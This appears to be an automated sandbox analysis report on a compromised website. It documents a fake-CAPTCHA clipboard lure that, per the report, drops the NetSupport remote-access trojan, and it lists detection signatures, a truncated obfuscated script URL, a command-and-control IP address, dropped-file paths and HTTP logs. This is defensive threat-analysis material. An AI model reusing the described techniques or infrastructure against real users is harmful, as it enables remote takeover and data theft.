Windows Analysis Report
http://www.focuslight.com/

General Information

Sample URL: http://www.focuslight.com/
Analysis ID: 1700159
Infos: yarasigma

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Powershell drops PE file
Sample is not signed and drops a device driver
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Invalid T&C link found
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe ReversingLabs: Detection: 16%

Phishing
barindex
Yara detected CAPTCHA Scam ClickFix
Source: Yara match File source: 0.2.pages.csv, type: HTML
HTML page contains obfuscated javascript
Source: https://ace-project.org/d.js HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
Invalid T&C link found
Source: https://www.focuslight.com/ HTTP Parser: Invalid link: Privacy Statement
Source: https://www.focuslight.com/ HTTP Parser: No favicon
Source: https://www.focuslight.com/ HTTP Parser: No favicon
Source: https://www.focuslight.com/ HTTP Parser: No favicon
Source: https://www.focuslight.com/ HTTP Parser: No <meta name="author".. found
Source: https://www.focuslight.com/ HTTP Parser: No <meta name="copyright".. found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000001D.00000002.2023427992.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000021.00000002.1892321802.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000022.00000002.1974260328.0000000070142000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: msvcr100.i386.pdb source: client32.exe, 0000001D.00000002.2022808297.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000021.00000002.1892063645.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000022.00000002.1974000969.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: g:\workspace\wsk\divert\install\WDDK\amd64\itvwd64.pdb source: powershell.exe, 0000001C.00000002.1759185059.0000000004FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004F2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000509B000.00000004.00000800.00020000.00000000.sdmp, itvwd64.sys4.28.dr, itvwd64.sys.28.dr, itvwd64.sys0.28.dr, itvwd64.sys2.28.dr
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 0000001D.00000000.1763409289.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000001D.00000002.2019779438.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000000.1888686094.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000002.1890861207.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000002.1973402402.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000000.1969236658.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2023193636.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000021.00000002.1892228410.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000022.00000002.1974174646.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, pcicapi.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.28.dr

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2061991 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (ace-project .org) : 192.168.2.4:64780 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061991 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (ace-project .org) : 192.168.2.4:52899 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061994 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (ace-project .org) : 192.168.2.4:49741 -> 162.214.153.12:443
Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49762 -> 5.252.178.123:443
Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.4:49762 -> 5.252.178.123:443
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Source: itvwd64.sys.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys0.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys1.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys2.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys3.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys4.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49760 -> 141.193.213.10:443
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 84.201.221.37
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 84.201.221.37
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: global traffic HTTP traffic detected: GET / HTTP/1.1host: www.focuslight.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_css/owl.carousel.min.css HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_css/animate.min.css HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_css/public.css?v=1 HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/jquery-3.6.0.min.js HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/owl.carousel.min.js HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/public.js HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/wow.min.js HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/layer/layer.js HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicnred0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/layer/theme/default/layer.css?v=3.1.1 HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicnred0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo-white.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/sousuo0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtlered0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xiangxia.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtrired1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
